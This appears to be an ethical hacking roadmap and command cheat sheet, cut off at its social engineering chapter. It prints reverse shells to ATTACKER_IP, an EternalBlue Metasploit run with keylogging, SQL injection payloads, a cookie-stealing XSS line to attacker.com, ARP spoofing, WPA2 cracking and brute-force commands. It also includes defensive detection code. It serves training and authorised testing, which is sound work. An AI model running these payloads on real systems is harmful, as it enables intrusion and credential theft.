// COMPLETE ROADMAP v1.0 //

ETHICAL HACKING

& PENETRATION TESTING

Complete Roadmap & Guide

From Reconnaissance to Reporting — the A to Z of Ethical Hacking, with a complete roadmap, cheat sheets, and a hands-on guide.

hacker@kali:~# whoami
ethical_hacker_in_training
hacker@kali:~# cat goal.txt
Learn → Understand → Break → Protect
hacker@kali:~# ./start_journey.sh
[+] Loading roadmap...
// TABLE OF CONTENTS //

01  Intro to Ethical Hacking & Roadmap [FOUNDATION]
    What is Hacking, Legal Framework, Career Path, Mindset
02  Reconnaissance — Information Gathering [RECON]
    Passive vs Active Recon, OSINT, Google Dorks, Shodan
03  Scanning & Enumeration [SCAN]
    Nmap, Masscan, Nikto, Banner Grabbing, Service Detection
04  Vulnerability Assessment [VULN]
    CVE, CVSS, OpenVAS, Nessus, Manual Analysis
05  Exploitation — Taking Advantage of Vulnerabilities [EXPLOIT]
    Metasploit, Manual Exploits, Buffer Overflow, CVE Exploit
06  Post-Exploitation & Privilege Escalation [POST-EX]
    Persistence, Lateral Movement, Data Exfiltration
07  Web Application Hacking [WEB]
    OWASP Top 10, SQLi, XSS, SSRF, Burp Suite Workflow
08  Network Hacking & Wireless [NETWORK]
    MITM, ARP Spoofing, WiFi Cracking, WPA2 Attack
09  Password Attacks & Cracking [CRACK]
    Hashcat, John, Hydra, Rainbow Tables, Wordlists
10  Social Engineering [SOCIAL]
    Phishing, Vishing, Pretexting, SET Framework
11  Reporting & Documentation [REPORT]
    Writing Pentest Reports, CVSS Scoring, Executive Summary
12  Cheat Sheet — Complete Reference [CHEAT]
    Nmap, Metasploit, SQLi, XSS, Reverse Shell — All Commands
CHAPTER 01
🎯 Intro to Ethical Hacking & Complete Roadmap
What Hacking is, why to learn it, Career Paths, and the Ethical Hacker Mindset

What is Ethical Hacking?

Ethical Hacking is the process by which an authorized person identifies vulnerabilities in a system, network, or application so that they can be fixed. It is also called Penetration Testing or White Hat Hacking.

🟢 White Hat

Tests systems with permission. Ethical hacker. Legal.

🟡 Grey Hat

Sometimes acts without permission, but with no malicious intent. Legally risky.

🔴 Black Hat

Breaks into systems without permission. Criminal. Illegal.

Penetration Testing Methodology

  1. 🕵️ Reconnaissance
  2. 🔍 Scanning
  3. 🎯 Gaining Access
  4. ⬆️ Maintaining Access
  5. 🧹 Clearing Tracks
  6. 📝 Reporting

Complete Learning Roadmap

  1. 🌱 Foundation (1-3 Months): what you need to know before starting
     Linux Basics, Networking (TCP/IP), Python Scripting, Web Basics (HTTP), Virtualization (VMware/VBox)
  2. 🔍 Reconnaissance & Scanning (2-3 Months): techniques for gathering information about a target
     Nmap, OSINT (Maltego), Google Dorks, Shodan, theHarvester, Nikto
  3. 💥 Exploitation (3-4 Months): finding and exploiting vulnerabilities
     Metasploit, Burp Suite, SQLi / XSS, Buffer Overflow, CVE Research
  4. ⬆️ Post-Exploitation & PrivEsc (2-3 Months): what to do after getting into a system
     LinPEAS/WinPEAS, Mimikatz, BloodHound, Persistence, Pivoting
  5. 🏆 Certification & CTF (Ongoing): certifications that prove your skills
     CEH, OSCP, eJPT, TryHackMe, HackTheBox, Bug Bounty

Career Path — Where Can You Go?

Role | Work | Avg Salary (USD) | Required Certs
Penetration Tester | Break systems & report | $80K–$130K | OSCP, CEH
Bug Bounty Hunter | Find bugs, get rewards | $20K–$200K+ | None
Red Team Operator | Simulate real attackers | $100K–$160K | OSCP, CRTO
Security Researcher | Research new vulnerabilities | $90K–$150K | CVE Publication
SOC Analyst | Detect & respond to attacks | $55K–$90K | CompTIA Security+

⚖️ Legal Warning

Always work with written permission. Unauthorized hacking is a criminal offense under Bangladesh's Digital Security Act and abroad under laws such as the US Computer Fraud and Abuse Act (CFAA). Practice on HackTheBox, TryHackMe, or in your own lab.

// Key Takeaways //

  • 🟢 Ethical Hacking = Permission + Skill + Responsibility
  • 🔵 You cannot learn hacking without a foundation: learn Linux, Networking, and Python first
  • 🔴 Always practice in a legal environment
  • 🟡 Follow the roadmap; there are no shortcuts
CHAPTER 02
🕵️ Reconnaissance — Information Gathering
Gathering as much information as possible about the target is the first and most important step

Passive vs Active Reconnaissance

🔇 Passive Recon

Gathering information without any direct contact with the target. Completely stealthy: the target does not notice.

  • WHOIS lookup
  • Google Dorks
  • LinkedIn/Social Media
  • Shodan / Censys
  • DNS Records
  • Job Postings (tech stack)

📡 Active Recon

Gathering information by interacting directly with the target. May leave traces in the target's logs.

  • Nmap port scanning
  • Banner grabbing
  • Ping sweep
  • DNS zone transfer
  • Web crawling
  • Traceroute

OSINT — Open Source Intelligence

OSINT is building intelligence about a target from publicly available information. Professional pentesters spend 60-70% of their time on recon.

Google Dorks — Search Engine Hacking

# Google Dork Examples
site:target.com filetype:pdf
site:target.com inurl:admin
site:target.com intitle:"index of"
inurl:target.com ext:sql | ext:db | ext:log
"@target.com" filetype:xls
site:target.com intext:"password" OR intext:"passwd"
intitle:"Apache Status" inurl:server-status
site:target.com cache:target.com

# Subdomain enumeration via Google
site:*.target.com -www

WHOIS & DNS Enumeration

# WHOIS lookup
$ whois target.com
$ whois 192.168.1.1

# DNS Enumeration
$ nslookup target.com
$ dig target.com ANY
$ dig target.com MX
$ dig target.com NS
$ host -t ns target.com

# DNS Zone Transfer (misconfiguration check)
$ dig axfr @ns1.target.com target.com
$ dnsrecon -d target.com -t axfr

# Subdomain Enumeration
$ sublist3r -d target.com
$ amass enum -d target.com
$ dnsx -d target.com -w /usr/share/wordlists/dns.txt

Shodan — The Search Engine of the Internet

# Shodan CLI
$ shodan init YOUR_API_KEY
$ shodan host 192.168.1.1
$ shodan search "apache 2.4" country:BD
$ shodan search "port:22" org:"target company"

# Shodan Dorks (web interface)
hostname:target.com
org:"Target Organization"
net:192.168.0.0/24
port:3306 country:BD                      # MySQL servers
"default password" port:80
vuln:CVE-2021-44228                       # Log4Shell vulnerable

Email Harvesting

$ theHarvester -d target.com -b google,bing,linkedin
$ theHarvester -d target.com -b all -l 500 -f output.html
# hunter.io  — web-based email finder (browser, not a CLI)
# emailhippo — web-based email validation

// Recon Checklist //

  • Gather WHOIS and DNS records
  • Enumerate subdomains
  • Build a list of email addresses and employees
  • Find exposed services with Shodan
  • Find sensitive files with Google Dorks
  • Work out the tech stack from social media
CHAPTER 03
🔍 Scanning & Enumeration
Techniques for detecting open ports, running services, and OS versions

Nmap — The Most Important Scanning Tool

# Basic Scans
$ nmap 192.168.1.1                        # Basic scan
$ nmap 192.168.1.0/24                     # Network range
$ nmap -p 80,443,22,21 192.168.1.1        # Specific ports
$ nmap -p- 192.168.1.1                    # All 65535 ports
$ nmap -p 1-1000 192.168.1.1              # Port range

# Scan Types
$ nmap -sS 192.168.1.1                    # SYN (Stealth) scan
$ nmap -sT 192.168.1.1                    # TCP Connect scan
$ nmap -sU 192.168.1.1                    # UDP scan
$ nmap -sA 192.168.1.1                    # ACK scan (firewall detection)

# Service & OS Detection
$ nmap -sV 192.168.1.1                    # Service version
$ nmap -O 192.168.1.1                     # OS detection
$ nmap -A 192.168.1.1                     # Aggressive (OS+Version+Scripts)
$ nmap -sV --version-intensity 9 192.168.1.1   # Max version detection

# NSE Scripts
$ nmap --script vuln 192.168.1.1          # Vulnerability scan
$ nmap --script "smb-vuln-*" 192.168.1.1  # SMB vulnerabilities (quoted so the shell does not expand *)
$ nmap --script http-enum 192.168.1.1     # Web enumeration
$ nmap --script ftp-anon 192.168.1.1      # Anonymous FTP
$ nmap --script ssh-brute 192.168.1.1     # SSH brute force

# Evasion Techniques
$ nmap -D RND:10 192.168.1.1              # Decoy scan
$ nmap -f 192.168.1.1                     # Fragment packets
$ nmap --source-port 53 192.168.1.1       # Spoof source port
$ nmap -T0 192.168.1.1                    # Paranoid (very slow)

# Output Formats
$ nmap -oN output.txt 192.168.1.1         # Normal text
$ nmap -oX output.xml 192.168.1.1         # XML format
$ nmap -oG output.gnmap 192.168.1.1       # Grepable
$ nmap -oA output 192.168.1.1             # All formats

Service-Specific Enumeration

SMB Enumeration (Port 445)

$ enum4linux -a 192.168.1.1
$ smbclient -L //192.168.1.1 -N
$ smbmap -H 192.168.1.1
$ crackmapexec smb 192.168.1.1
$ nmap --script smb-enum-users 192.168.1.1

Web Enumeration (Port 80/443)

# Directory Bruteforce
$ gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt
$ ffuf -w wordlist.txt -u http://target.com/FUZZ
$ dirb http://target.com

# Web Scanner
$ nikto -h http://target.com
$ whatweb http://target.com
$ wafw00f http://target.com               # WAF detection

FTP / SSH / SNMP Enumeration

# FTP (Port 21) — Anonymous Login Check
$ nmap --script ftp-anon,ftp-bounce -p 21 192.168.1.1

# SSH (Port 22)
$ ssh-audit 192.168.1.1                   # Algorithm & version check

# SNMP (Port 161) — Community string
$ snmpwalk -c public -v1 192.168.1.1
$ onesixtyone -c community.txt 192.168.1.1

Important Port Numbers
21 → FTP    22 → SSH    23 → Telnet
25 → SMTP   53 → DNS    80 → HTTP
110 → POP3   143 → IMAP   443 → HTTPS
445 → SMB    3306 → MySQL   3389 → RDP
5432 → PostgreSQL   6379 → Redis
8080 → HTTP-Alt   27017 → MongoDB
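As an added example (not part of the original guide), a Python parser for the -oX XML output format shown above that lists every open port per host and flags the ones from the port list that should not normally be exposed; the XML sample and the RISKY_PORTS policy are constructed for this demonstration.

```python
# Added example: parse Nmap -oX output and flag exposed services (not from the original guide).
import xml.etree.ElementTree as ET

# Ports from the guide's "Important Port Numbers" list that should not normally be
# reachable from untrusted networks (this policy is an assumption of the example).
RISKY_PORTS = {
    21: "FTP (cleartext logins)", 23: "Telnet (cleartext)", 445: "SMB",
    3306: "MySQL", 3389: "RDP", 5432: "PostgreSQL", 6379: "Redis", 27017: "MongoDB",
}

# Constructed sample in Nmap's XML output format, reduced to the elements used below.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX output.xml 192.168.1.0/24">
  <host><status state="up"/><address addr="192.168.1.1" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/></port>
      <port protocol="tcp" portid="23"><state state="open"/><service name="telnet"/></port>
      <port protocol="tcp" portid="80"><state state="closed"/><service name="http"/></port>
      <port protocol="tcp" portid="6379"><state state="open"/>
        <service name="redis" product="Redis key-value store" version="6.0.16"/></port>
    </ports></host>
  <host><status state="up"/><address addr="192.168.1.2" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="443"><state state="open"/>
        <service name="https" product="nginx" version="1.18.0"/></port>
    </ports></host>
</nmaprun>"""


def parse_open_ports(xml_text):
    """Return (ip, port, protocol, service, banner) for every open port in the scan."""
    results = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            fields = (svc.get("product"), svc.get("version")) if svc is not None else ()
            banner = " ".join(f for f in fields if f)
            results.append((addr.get("addr"), int(port.get("portid")), port.get("protocol"), name, banner))
    return results


def flag_risky(open_ports):
    """Keep only the open ports covered by RISKY_PORTS, with the reason for review."""
    return [(ip, port, RISKY_PORTS[port]) for ip, port, _proto, _svc, _banner in open_ports
            if port in RISKY_PORTS]


if __name__ == "__main__":
    found = parse_open_ports(SAMPLE_XML)
    for entry in found:
        print("open  ", entry)
    for ip, port, reason in flag_risky(found):
        print(f"REVIEW {ip}:{port} -> {reason}")
```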
CHAPTER 04
🎯 Vulnerability Assessment
CVE, CVSS Score, automated and manual vulnerability analysis

Understanding CVE & CVSS Score

CVE (Common Vulnerabilities and Exposures) is a unique identifier for a publicly disclosed vulnerability. Each CVE carries a CVSS Score between 0 and 10.

CVSS Score | Severity | Meaning
9.0 – 10.0 | CRITICAL | Immediate patch required
7.0 – 8.9 | HIGH | Fix soon
4.0 – 6.9 | MEDIUM | Fix with planning
0.1 – 3.9 | LOW | Less urgent

Automated Vulnerability Scanners

# OpenVAS (Free)
$ sudo gvm-start                          # Web UI: https://localhost:9392

# Nessus Essentials (Free for 16 IPs)
# Web UI: https://localhost:8834

# Nuclei (Fast, template-based)
$ nuclei -u https://target.com
$ nuclei -u https://target.com -t cves/
$ nuclei -l urls.txt -t vulnerabilities/
$ nuclei -u target.com -severity critical,high

# searchsploit — Exploit Database
$ searchsploit apache 2.4
$ searchsploit -m 44228                   # Copy exploit to current dir
$ searchsploit --cve 2021-44228

Manual Vulnerability Research

🔍 Information Sources

  • NVD — nvd.nist.gov
  • Exploit-DB — exploit-db.com
  • CVE Details — cvedetails.com
  • Packet Storm — packetstormsecurity.com
  • GitHub — PoC exploits
  • VulnHub — Vulnerable VMs

Manual Analysis Steps

  • Note the service and its version
  • Search for exploits with searchsploit
  • Check the CVE database
  • Read and understand the exploit
  • Test in a lab first
  • Don't go out of scope
CHAPTER 05
💥 Exploitation — Taking Advantage of Vulnerabilities
Metasploit Framework, manual exploits, and reverse shells

Metasploit Framework

# Start Metasploit
$ msfconsole
msf6 > help

# Search & Use Module
msf6 > search eternalblue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > info
msf6 > show options
msf6 > set RHOSTS 192.168.1.1
msf6 > set LHOST 192.168.1.100
msf6 > set LPORT 4444
msf6 > set payload windows/x64/meterpreter/reverse_tcp
msf6 > run

# Meterpreter Commands
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getsystem                   # Privilege Escalation
meterpreter > hashdump                    # Password hashes
meterpreter > shell
meterpreter > upload /path/to/file C:\\Windows\\Temp\\
meterpreter > download C:\\file.txt /local/path/
meterpreter > screenshot
meterpreter > keyscan_start               # Keylogger
meterpreter > run post/multi/recon/local_exploit_suggester

Reverse Shell

# Listener setup (attacker machine)
$ nc -lvnp 4444
$ rlwrap nc -lvnp 4444                    # With readline support

# Bash Reverse Shell
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1

# Python Reverse Shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# PHP Reverse Shell
php -r '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# PowerShell Reverse Shell (Windows)
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);..."

# Netcat Reverse Shell
nc -e /bin/sh ATTACKER_IP 4444

# Upgrade to fully interactive shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo; fg
export TERM=xterm

Common Exploit Types

🔴 Famous CVE Exploits

  • EternalBlue (MS17-010) — SMB
  • Log4Shell (CVE-2021-44228)
  • PrintNightmare (CVE-2021-34527)
  • Shellshock (CVE-2014-6271) — Bash
  • Heartbleed (CVE-2014-0160) — OpenSSL
  • BlueKeep (CVE-2019-0708) — RDP

🟣 Payload Types

  • Singles: self-contained, no stage
  • Stagers: small, download the stage
  • Stages: loaded by a stager
  • Meterpreter: advanced, in-memory
  • Shell: simple command shell
CHAPTER 06
⬆️ Post-Exploitation & Privilege Escalation
After getting in: Persistence, PrivEsc, Lateral Movement, Data Exfiltration

Privilege Escalation — Linux

# Automated Enumeration
$ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
$ wget -O linpeas.sh https://linpeas.sh && chmod +x linpeas.sh && ./linpeas.sh

# Manual Checks
$ id && whoami
$ sudo -l                                 # Sudo permissions
$ find / -perm -u=s -type f 2>/dev/null   # SUID files
$ cat /etc/crontab                        # Cron jobs
$ grep -v nologin /etc/passwd             # Accounts with a login shell
$ ss -tulpn                               # Listening ports
$ ps aux                                  # Running processes
$ find / -writable -type d 2>/dev/null    # Writable dirs
$ uname -a                                # Kernel version

# GTFOBins — SUID exploit reference
# https://gtfobins.github.io
$ sudo find . -exec /bin/sh \; -quit      # find via sudo
$ sudo vim -c ':!/bin/sh'                 # vim via sudo

Privilege Escalation — Windows

# WinPEAS
C:\> winpeas.exe

# Manual Checks
C:\> whoami /priv
C:\> net user
C:\> net localgroup administrators
C:\> systeminfo
C:\> sc query type= all state= all
C:\> wmic service get name,startname
PS > Get-HotFix | sort InstalledOn        # Missing patches

# Token Impersonation (Meterpreter)
meterpreter > use incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"

Persistence Techniques

🐧 Linux Persistence

  • Add a cron job
  • Inject an SSH key
  • .bashrc backdoor
  • Create a systemd service
  • Create a SUID binary

🪟 Windows Persistence

  • Registry Run key
  • Scheduled Task
  • Startup folder
  • Install a service
  • DLL Hijacking
CHAPTER 07
🌐 Web Application Hacking
OWASP Top 10, SQLi, XSS, CSRF, SSRF, File Upload, Burp Suite Workflow

OWASP Top 10 (2021)

# | Vulnerability | Summary
A01 | Broken Access Control | Unauthorized resource access
A02 | Cryptographic Failures | Weak encryption, HTTP, plain-text passwords
A03 | Injection | SQLi, XSS, Command Injection
A04 | Insecure Design | Business logic flaws
A05 | Security Misconfiguration | Default passwords, verbose errors
A06 | Vulnerable Components | Outdated library/framework
A07 | Auth Failures | Weak passwords, broken sessions
A08 | Software Integrity Failures | CI/CD pipeline attacks
A09 | Logging Failures | Insufficient logging & monitoring
A10 | SSRF | Server-side request forgery

SQL Injection

# Basic SQLi Test
' OR '1'='1
' OR '1'='1'--
' OR 1=1--
" OR "1"="1
admin'--
') OR ('1'='1

# UNION-based SQLi
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT username,password FROM users--

# Error-based SQLi
' AND extractvalue(1,concat(0x7e,version()))--
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(version(),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

# Blind SQLi (Boolean-based)
' AND 1=1--                               # True → page loads normally
' AND 1=2--                               # False → page changes
' AND SUBSTRING(username,1,1)='a'--

# SQLMap — Automated SQLi
$ sqlmap -u "http://target.com/page.php?id=1"
$ sqlmap -u "http://target.com/page.php?id=1" --dbs
$ sqlmap -u "http://target.com/page.php?id=1" -D mydb --tables
$ sqlmap -u "http://target.com/page.php?id=1" -D mydb -T users --dump
$ sqlmap -r request.txt --level 5 --risk 3

Cross-Site Scripting (XSS)

# Basic XSS Payloads
<script>alert('XSS')</script>
<script>alert(document.cookie)</script>
<img src=x onerror=alert('XSS')>
<svg onload=alert('XSS')>
'"><script>alert(1)</script>

# Cookie Stealing
<script>document.location='http://attacker.com/steal?c='+document.cookie</script>

# WAF Bypass
<ScRiPt>alert(1)</ScRiPt>
<script>eval(atob('YWxlcnQoMSk='))</script>
<img src="x" onerror="alert(1)">

Burp Suite Workflow

🔧 Core Features

  • Proxy: intercept HTTP requests
  • Repeater: modify and resend requests manually
  • Intruder: automated fuzzing
  • Scanner: automated vulnerability scan
  • Decoder: encode/decode data
  • Comparer: compare responses

🎯 Testing Workflow

  1. Set the proxy in the browser
  2. Browse the target and view the requests
  3. Send interesting requests to Repeater
  4. Modify parameters and test
  5. Fuzz with Intruder
  6. Run an automated scan with Scanner
CHAPTER 08
📡 Network Hacking & Wireless
MITM Attack, ARP Spoofing, WiFi Password Cracking, WPA2 Attack

Man-in-the-Middle (MITM) Attack

# ARP Spoofing
$ arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP
$ arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP

# Enable IP Forwarding
$ echo 1 > /proc/sys/net/ipv4/ip_forward

# Bettercap — All-in-one MITM
$ bettercap -iface eth0
» net.probe on
» net.recon on
» set arp.spoof.targets VICTIM_IP
» arp.spoof on
» net.sniff on
» https.proxy on                          # SSL Strip
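From the defender's side, an added Python example (not from the original guide) that applies the two symptoms the attack above produces, an IP whose MAC changes and one MAC answering for several IPs, to a constructed list of observed ARP replies; a real deployment would feed it from a packet capture or a switch's ARP table, and static ARP entries or dynamic ARP inspection on the switch remove the attack surface.

```python
# Added example: flag ARP spoofing symptoms in observed ARP replies (not from the original guide).
from collections import defaultdict

# Constructed sample: (seconds, sender IP, sender MAC) from ARP "is-at" replies on one LAN.
# 192.168.1.1 is the gateway (real MAC aa:...:01); cc:...:99 is a host poisoning the caches.
ARP_REPLIES = [
    (0.0, "192.168.1.1",  "aa:aa:aa:aa:aa:01"),
    (0.5, "192.168.1.20", "bb:bb:bb:bb:bb:20"),
    (1.0, "192.168.1.1",  "aa:aa:aa:aa:aa:01"),
    (2.0, "192.168.1.1",  "cc:cc:cc:cc:cc:99"),  # gateway IP now claimed by another MAC
    (2.1, "192.168.1.20", "cc:cc:cc:cc:cc:99"),  # same MAC also claims the victim's IP
    (3.0, "192.168.1.1",  "aa:aa:aa:aa:aa:01"),  # real gateway answers again (flapping)
]


def detect_arp_spoof(replies, max_ips_per_mac=1):
    """Return alert strings for (1) an IP whose MAC changes and (2) one MAC claiming
    more than max_ips_per_mac addresses. Routers that legitimately own several IPs
    should be allow-listed by raising the limit for them."""
    alerts = []
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    for ts, ip, mac in replies:
        mac = mac.lower()
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append(f"t={ts:.1f}s {ip} changed {previous} -> {mac}")
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > max_ips_per_mac:
                alerts.append(f"t={ts:.1f}s {mac} claims {len(mac_to_ips[mac])} IPs: "
                              f"{sorted(mac_to_ips[mac])}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(ARP_REPLIES):
        print("ALERT", alert)
```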

WiFi Hacking — WPA/WPA2

⚠️ Only on your own network or with permission!

# Monitor Mode
$ airmon-ng check kill
$ airmon-ng start wlan0                   # Now the interface is wlan0mon

# Scan Networks
$ airodump-ng wlan0mon

# Capture Handshake
$ airodump-ng --bssid TARGET_MAC -c CHANNEL -w capture wlan0mon

# Deauth Attack (force reconnect)
$ aireplay-ng -0 5 -a TARGET_MAC -c CLIENT_MAC wlan0mon

# Crack WPA2 Handshake
$ aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt
$ hashcat -m 22000 capture.hc22000 rockyou.txt

# WPS Attack (Pixie Dust)
$ wash -i wlan0mon                        # Find WPS-enabled APs
$ reaver -i wlan0mon -b TARGET_MAC -vv

Packet Sniffing

# Tcpdump
$ tcpdump -i eth0
$ tcpdump -i eth0 -w capture.pcap
$ tcpdump -r capture.pcap
$ tcpdump host 192.168.1.1
$ tcpdump port 80
$ tcpdump -A port 80                      # ASCII output (HTTP)

# Tshark (Wireshark CLI)
$ tshark -i eth0
$ tshark -r capture.pcap -Y "http.request"
$ tshark -r capture.pcap -Y "ftp" -T fields -e ftp.request.arg
CHAPTER 09
🔑 Password Attacks & Cracking
Hash cracking, Brute Force, Dictionary Attacks, Rainbow Tables

Hash Identification & Cracking

# Identify Hash Type
$ hash-identifier
$ hashid "5f4dcc3b5aa765d61d8327deb882cf99"
$ name-that-hash -t "hash_value"

# Hashcat — GPU-powered cracking
$ hashcat -m 0 hash.txt rockyou.txt       # MD5
$ hashcat -m 100 hash.txt rockyou.txt     # SHA1
$ hashcat -m 1000 hash.txt rockyou.txt    # NTLM
$ hashcat -m 1800 hash.txt rockyou.txt    # SHA-512crypt
$ hashcat -m 22000 wpa.hc22000 rockyou.txt   # WPA2
$ hashcat -m 0 hash.txt -a 3 ?l?l?l?l?l?l # Brute Force
$ hashcat -m 0 hash.txt -r rules/best64.rule rockyou.txt

# John the Ripper
$ john hash.txt
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
$ john hash.txt --format=md5crypt
$ john --show hash.txt                    # Show cracked passwords
$ unshadow /etc/passwd /etc/shadow > combined.txt && john combined.txt
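An added Python example (not from the original guide) showing what hashcat -m 0 and rainbow tables exploit and what a defender stores instead: the hashid sample value above is reversed by a four-word lookup table because unsalted MD5 is deterministic, while a salted PBKDF2 record for the same password cannot be looked up that way; the word list and the iteration count are this example's choices.

```python
# Added example: unsalted fast hash vs. salted slow hash (not from the original guide).
import hashlib
import hmac
import os

# Constructed four-word lookup table: the idea behind a rainbow/precomputed table.
COMMON_WORDS = ["password", "123456", "letmein", "qwerty"]
MD5_LOOKUP = {hashlib.md5(w.encode()).hexdigest(): w for w in COMMON_WORDS}


def lookup_unsalted_md5(hash_hex):
    """Unsalted MD5 is deterministic, so a precomputed table reverses it with one dict lookup."""
    return MD5_LOOKUP.get(hash_hex.lower())


def store_password(password, iterations=600_000):
    """Defender's storage: random per-user salt + PBKDF2-HMAC-SHA256 (count is an assumption)."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute with the stored salt and count; compare in constant time."""
    algo, iterations, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash record")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


if __name__ == "__main__":
    # The guide's hashid example value reverses immediately.
    print(lookup_unsalted_md5("5f4dcc3b5aa765d61d8327deb882cf99"))   # password
    # Two users with the same password get different records, so no shared lookup applies.
    a, b = store_password("password"), store_password("password")
    print(a != b, verify_password("password", a), verify_password("wrong", a))
```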

Online Service Brute Force

# Hydra — Network Login Cracker
$ hydra -l admin -P rockyou.txt ssh://192.168.1.1
$ hydra -L users.txt -P rockyou.txt ftp://192.168.1.1
$ hydra -l admin -P rockyou.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"
$ hydra -l admin -P rockyou.txt rdp://192.168.1.1
$ hydra -l admin -P rockyou.txt smtp://mail.target.com

# Medusa
$ medusa -h 192.168.1.1 -u admin -P rockyou.txt -M ssh

# CrackMapExec — SMB Password Spray
$ crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt
$ crackmapexec smb 192.168.1.1 -u admin -p 'Password123!'
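Added example (not from the original guide) of the log evidence the SSH attacks above leave behind: a Python detector over constructed OpenSSH auth.log lines that alerts on a burst of failed logins from one source and again on a success that follows it; the threshold and window are this example's choices, and tools such as fail2ban apply the same idea to ban the source.

```python
# Added example: detect SSH password-guessing bursts in auth.log lines (not from the original guide).
import re
from collections import defaultdict, deque
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)

# Constructed OpenSSH auth.log excerpt (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
Mar 10 12:00:01 web1 sshd[2101]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Mar 10 12:00:02 web1 sshd[2102]: Failed password for root from 203.0.113.5 port 51235 ssh2
Mar 10 12:00:02 web1 sshd[2103]: Failed password for invalid user test from 203.0.113.5 port 51236 ssh2
Mar 10 12:00:03 web1 sshd[2104]: Failed password for root from 203.0.113.5 port 51237 ssh2
Mar 10 12:00:04 web1 sshd[2105]: Failed password for invalid user oracle from 203.0.113.5 port 51238 ssh2
Mar 10 12:00:09 web1 sshd[2106]: Accepted password for root from 203.0.113.5 port 51240 ssh2
Mar 10 12:05:00 web1 sshd[2107]: Failed password for alice from 198.51.100.7 port 40000 ssh2
Mar 10 12:05:20 web1 sshd[2108]: Accepted password for alice from 198.51.100.7 port 40001 ssh2
"""


def parse_auth_lines(lines):
    """Yield (timestamp, 'Failed'|'Accepted', user, source_ip) for sshd password events."""
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            # syslog timestamps carry no year; relative arithmetic inside one file is enough here
            yield datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["result"], m["user"], m["ip"]


def detect_bruteforce(lines, threshold=5, window_s=60):
    """Alert once per source that fails >= threshold times within window_s seconds,
    and again if that source later logs in successfully (a likely guessed credential)."""
    alerts = []
    recent = defaultdict(deque)      # ip -> timestamps of failures inside the window
    users_tried = defaultdict(set)
    flagged = set()
    for ts, result, user, ip in parse_auth_lines(lines):
        if result == "Failed":
            window = recent[ip]
            window.append(ts)
            users_tried[ip].add(user)
            while (ts - window[0]).total_seconds() > window_s:
                window.popleft()
            if len(window) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("BRUTE_FORCE", ip, len(window), sorted(users_tried[ip])))
        elif ip in flagged:
            alerts.append(("SUCCESS_AFTER_BRUTE_FORCE", ip, user))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG.splitlines()):
        print("ALERT", alert)
```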

Wordlists

Wordlist | Size | Use
rockyou.txt | 14M passwords | Most commonly used
SecLists | Huge collection | Directory, username, password lists
kaonashi.txt | 500M+ | Powerful cracking list
hashkiller | Online | Pre-computed hashes
CHAPTER 10
🎭 Social Engineering
Techniques that use human psychology to extract information or access

What is Social Engineering?

Social Engineering is exploiting human psychology and trust to extract sensitive information or gain unauthorized access. Exploiting human weaknesses is often much easier than exploiting technical ones.

📧 Phishing

Sending fake emails to trick users into clicking harmful links or handing over credentials.

📞 Vishing

Extracting information over the phone by posing as IT support or a bank.

💬 Pretexting

Creating a false identity and scenario to gain the target's trust.

🪤 Baiting

Leaving a USB drive around, or luring with free software, to get malware installed.

Social Engineering Toolkit (SET)

# Launch SET
